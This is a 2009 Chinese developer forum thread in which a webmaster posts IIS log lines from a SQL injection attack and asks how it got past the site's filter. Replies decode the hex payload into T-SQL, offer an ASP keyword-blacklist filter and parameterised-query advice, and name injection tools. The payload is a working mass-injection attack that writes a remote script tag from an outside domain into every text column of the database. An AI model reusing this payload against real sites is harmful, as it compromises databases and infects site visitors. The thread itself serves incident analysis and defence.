2.8w+
社区成员
- 主页
关于SQL注入
前几天,我们公司网站被黑客挂上类似http://www.***.com/m.js远程木马,我检查了log发现如下日志非常可疑;
2009-07-21 16:20:02 W3SVC1 192.168.0.2 GET /in.asp id=1;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72%20eXeC(@s);-- 80 - 218.6.19.2 Mozilla/4.0 200 0 0
2009-07-21 16:20:02 W3SVC1 192.168.0.2 GET /in.asp id=1';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72%20eXeC(@s);-- 80 - 218.6.19.2 Mozilla/4.0 200 0 0
我疑惑的是在in.asp页面已经做过SQL防注入处理,我在IE地址栏提交,均被阻止,请问黑客怎么可以入侵数据库?
还有@s的内容全是数字,这是怎么处理的,可以帮忙解码么?
请问大家还有什么防止SQL注入的工具,或者扫描网站安全的工具,介绍一下,非常感激;
2009-07-21 16:20:02 W3SVC1 192.168.0.2 GET /in.asp id=1;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72%20eXeC(@s);-- 80 - 218.6.19.2 Mozilla/4.0 200 0 0
2009-07-21 16:20:02 W3SVC1 192.168.0.2 GET /in.asp id=1';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72%20eXeC(@s);-- 80 - 218.6.19.2 Mozilla/4.0 200 0 0
我疑惑的是在in.asp页面已经做过SQL防注入处理,我在IE地址栏提交,均被阻止,请问黑客怎么可以入侵数据库?
还有@s的内容全是数字,这是怎么处理的,可以帮忙解码么?
请问大家还有什么防止SQL注入的工具,或者扫描网站安全的工具,介绍一下,非常感激;
...全文
请发表友善的回复…
发表回复
lzp4881 2009-07-30
因为你的id是数值型的。用isnumeric判断一下id是否为数值就可以防止注入了。
如果是字符型的,就限制它的长度,它就基本没戏了。
如果是字符型的,就限制它的长度,它就基本没戏了。
wish 2009-07-29
把该文件保存为NoSQL.Asp文件 然后用<!--#include file="NoSQL.Asp"--> 导入到要防止sql注入的文件里即可
<%
If EnableStopInjection = True Then
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
Fy_Inf = split(Fy_In,"|")
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language='JavaScript'>alert('警告:您输入的内容含有非法字符!请重新输入!');history.back()</Script>"
Response.End
End If
Next
Next
End If
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language='JavaScript'>alert('警告:您输入的内容含有非法字符!请重新输入!');history.back()</Script>"
Response.End
Response.End
End If
Next
Next
End If
End If
%>
<%
If EnableStopInjection = True Then
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
Fy_Inf = split(Fy_In,"|")
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language='JavaScript'>alert('警告:您输入的内容含有非法字符!请重新输入!');history.back()</Script>"
Response.End
End If
Next
Next
End If
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language='JavaScript'>alert('警告:您输入的内容含有非法字符!请重新输入!');history.back()</Script>"
Response.End
Response.End
End If
Next
Next
End If
End If
%>
redcn2004 2009-07-29
被注入了,加个注入函数判断吧
kangsong 2009-07-29
可以使用带参数的存储过程
屏蔽掉特殊符号,如'';
设置下数据库权限
屏蔽掉特殊符号,如'';
设置下数据库权限
jinjazz 2009-07-29
3楼的防注入脚本是没有用的,你只要把当前sqlserver数据库的用户改为非dbo并且没有系统表访问权限就可以了
jinjazz 2009-07-29
in.asp id=1;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72%20eXeC(@s);
相当于执行了如下脚本
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://8f8el3l.cn/0.js></script>''')Fetch Next From Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor
相当于执行了如下脚本
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://8f8el3l.cn/0.js></script>''')Fetch Next From Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor
lubiaopan 2009-07-29
sql注入漏洞查看工具,nbsi,啊D注入工具,明小子等等,我建议你只要把错误提示信息关闭就好了
hookee 2009-07-28
原因参考http://huaidan.org/archives/1651.html
防注入要进行数据类型 长度 特征检查, 多利用ado或参数化sql,存储过程,避免sql拼接
防注入要进行数据类型 长度 特征检查, 多利用ado或参数化sql,存储过程,避免sql拼接